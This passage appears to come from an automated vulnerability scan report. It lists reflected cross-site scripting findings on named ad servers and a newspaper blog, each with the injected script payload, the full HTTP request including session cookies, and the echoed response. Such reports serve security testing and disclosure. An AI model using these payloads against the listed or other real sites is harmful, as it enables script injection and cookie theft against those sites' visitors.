The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 168c3"><script>alert(1)</script>e6ff1b42792 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728168c3"><script>alert(1)</script>e6ff1b42792/11297647300104@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=728&h=90&re=19969&pv=0&ra=6473367370.8131766689475626&rb=445&ca=&rc=10.2&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre647336735316&pb=&pc=&pd=&pg=&ct=1297647336737&pe=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html&pf=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; ATTWL=CollectiveB3; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; FarmersBranding=RocketFuelB3; id=914803576615380

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:36:24 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 364
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2145525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728168c3"><script>alert(1)</script>e6ff1b42792/303112085/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

3.118. http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90 [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f787"><script>alert(1)</script>32af85f766d was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x904f787"><script>alert(1)</script>32af85f766d HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=728&h=90&re=19969&pv=0&ra=6473367370.8131766689475626&rb=445&ca=&rc=10.2&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre647336735316&pb=&pc=&pd=&pg=&ct=1297647336737&pe=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html&pf=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; ATTWL=CollectiveB3; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; FarmersBranding=RocketFuelB3; id=914803576615380

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:36:26 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 357
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2645525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/2008971942/x904f787"><script>alert(1)</script>32af85f766d/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

3.119. http://b3.mookie1.com/2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53250"><script>alert(1)</script>f2c52472042 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TrafficMarketplaceB353250"><script>alert(1)</script>f2c52472042/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://media.adfrontiers.com/pq?t=f&s=530&ts=1297650508738&cm=191&ac=5&at=2&xvk=94178592.26350212&fd=t&tc=1&rr=t
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; ATTWL=CollectiveB3; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; FarmersBranding=RocketFuelB3; id=914803576615380; session=1297647384|1297647384

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 02:29:16 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 365
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TrafficMarketplaceB353250"><script>alert(1)</script>f2c52472042/ATTW/1H_11Q1/RON1HCPC/300/782092599/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

3.120. http://b3.mookie1.com/2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 106f9"><script>alert(1)</script>f534803ea84 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TrafficMarketplaceB3/ATTW106f9"><script>alert(1)</script>f534803ea84/1H_11Q1/RON1HCPC/300/1499044944143599616@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://media.adfrontiers.com/pq?t=f&s=530&ts=1297650508738&cm=191&ac=5&at=2&xvk=94178592.26350212&fd=t&tc=1&rr=t
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; ATTWL=CollectiveB3; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; FarmersBranding=RocketFuelB3; id=914803576615380; session=1297647384|1297647384

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 02:29:18 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 365
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TrafficMarketplaceB3/ATTW106f9"><script>alert(1)</script>f534803ea84/1H_11Q1/RON1HCPC/300/381312021/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

3.121. http://b3.mookie1.com/2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e043d"><script>alert(1)</script>d97c917261a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TrafficMarketplaceB3/ATTW/1H_11Q1e043d"><script>alert(1)</script>d97c917261a/RON1HCPC/300/1499044944143599616@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://media.adfrontiers.com/pq?t=f&s=530&ts=1297650508738&cm=191&ac=5&at=2&xvk=94178592.26350212&fd=t&tc=1&rr=t
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; ATTWL=CollectiveB3; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; FarmersBranding=RocketFuelB3; id=914803576615380; session=1297647384|1297647384

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 02:29:20 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 366
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TrafficMarketplaceB3/ATTW/1H_11Q1e043d"><script>alert(1)</script>d97c917261a/RON1HCPC/300/1322201168/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

3.122. http://b3.mookie1.com/2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 340af"><script>alert(1)</script>fde4b5f29d6 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC340af"><script>alert(1)</script>fde4b5f29d6/300/1499044944143599616@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://media.adfrontiers.com/pq?t=f&s=530&ts=1297650508738&cm=191&ac=5&at=2&xvk=94178592.26350212&fd=t&tc=1&rr=t
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; ATTWL=CollectiveB3; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; FarmersBranding=RocketFuelB3; id=914803576615380; session=1297647384|1297647384

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 02:29:24 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 365
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC340af"><script>alert(1)</script>fde4b5f29d6/300/423184803/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

3.123. http://b3.mookie1.com/2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1b98"><script>alert(1)</script>b58eeecf04b was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300a1b98"><script>alert(1)</script>b58eeecf04b/1499044944143599616@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://media.adfrontiers.com/pq?t=f&s=530&ts=1297650508738&cm=191&ac=5&at=2&xvk=94178592.26350212&fd=t&tc=1&rr=t
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; ATTWL=CollectiveB3; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; FarmersBranding=RocketFuelB3; id=914803576615380; session=1297647384|1297647384

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 02:29:26 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 365
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300a1b98"><script>alert(1)</script>b58eeecf04b/757931301/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

3.124. http://b3.mookie1.com/2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90 [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e8d6"><script>alert(1)</script>9f9e61b8a83 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x904e8d6"><script>alert(1)</script>9f9e61b8a83 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://media.adfrontiers.com/pq?t=f&s=530&ts=1297650508738&cm=191&ac=5&at=2&xvk=94178592.26350212&fd=t&tc=1&rr=t
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; ATTWL=CollectiveB3; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; FarmersBranding=RocketFuelB3; id=914803576615380; session=1297647384|1297647384

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 02:29:28 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 357
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/801120019/x904e8d6"><script>alert(1)</script>9f9e61b8a83/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

3.125. http://bid.openx.net/json [c parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bid.openx.net
Path:   /json

Issue detail

The value of the c request parameter is copied into the HTML document as plain text between tags. The payload 8223a<script>alert(1)</script>b163a0573ec was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /json?c=OXM_425158943748223a<script>alert(1)</script>b163a0573ec&pid=3a257c12-87aa-4e92-af61-e47d5422d9f7&s=160x600&f=1&cid=oxpv1%3A34-632-1929-1419-4033&hrid=02e3d43e8047564dc7fdfdccc682e0aa-1297647245&url=http%3A%2F%2Fadserver.adtechus.com%2Fadiframe%2F3.0%2F5235%2F1131606%2F0%2F154%2FADTECH%3Bcookie%3Dinfo%3Btarget%3D_blank%3Bkey%3Dkey1%2Bkey2%2Bkey3%2Bkey4%3Bgrp%3D000001 HTTP/1.1
Host: bid.openx.net
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x2ff8ff.js&size_id=9&account_id=6005&site_id=12414&size=160x60
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: p=1297527888; fc=H4sIAAAAAAAAAONlYOTgYWBgYGRg0GlkYAAA0iY5Vg8AAAA=; _wc[1297527893965]=H4sIAAAAAAAAAONgYGRg0GnkYGBiYOiq5WBgZmAozGQAAHz1QNYWAAAA; i=8e1bb757-a622-431b-967f-869e18a071fe

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=iso-8859-1
Cache-Control: no-cache, must-revalidate
P3P: CP="CUR ADM OUR NOR STA NID"
Connection: close
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Set-Cookie: s=a5f1e488-0086-4735-aa4d-21bbfb1228f5; version=1; path=/; domain=.openx.net;
Set-Cookie: p=1297647248; version=1; path=/; domain=.openx.net; max-age=63072000;
Set-Cookie: _wc[1297527893965]=; version=1; path=/; domain=.openx.net; max-age=0;
Set-Cookie: fc=H4sIAAAAAAAAAONlYOTgYWBgYGRg0GlkYAAA0iY5Vg8AAAA=; version=1; path=/; domain=.openx.net; max-age=31536000;

OXM_425158943748223a<script>alert(1)</script>b163a0573ec({"r":null});

3.126. http://blogs.desmoinesregister.com/dmr/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blogs.desmoinesregister.com
Path:   /dmr/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33191"><script>alert(1)</script>647610c6837 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dmr33191"><script>alert(1)</script>647610c6837/ HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=44754709-9119-4062-9c0e-f4c8a41d42ed; s_cc=true; s_sq=%5B%5BB%5D%5D; SiteLifeHost=gnvm25l3pluckcom; GCIONSN=AAAAOn52dzoy; gban=inter%3Ddisabled%3Atrue%2Cviews%3A1%2Cexpiry%3A15H%2Cplacementid%3A1272947%2Cpreload%3Afalse%2Cid%3Ainter%2Ccontrolurl%3Ahttp%253A//gannett.gcion.com/addyn/3.0/5111.1/1272948/0/0/ADTECH%253Balias%253Dblogs.desmoinesregister.com/dmr/wp-content/plugins/wp-email/email-css.csse743e%252522%25253E%25253Cscript%25253Ealert%2528document.cookie%2529%25253C/script%25253E045c9ac9fe9_Interstitial%253Bcookie%253Dinfo%253Bloc%253D100%253Btarget%253D_blank%253Bgrp%253D70722%253Bmisc%253D1297695939669%253Bsize%253D0%253Bnoperf%253D1%2Cexpires%3A1297749939

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2011 15:10:37 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 70697

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">


<head>
<title>Error | The Des Moines Register | DesMoinesRegister.com </title
...[SNIP]...
<link rel="canonical" href="http://blogs.desmoinesregister.com/dmr33191"><script>alert(1)</script>647610c6837/" />
...[SNIP]...

3.127. http://blogs.desmoinesregister.com/dmr/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blogs.desmoinesregister.com
Path:   /dmr/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6c487"%3balert(1)//001bc3b6472 was submitted in the REST URL parameter 1. This input was echoed as 6c487";alert(1)//001bc3b6472 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /dmr6c487"%3balert(1)//001bc3b6472/ HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml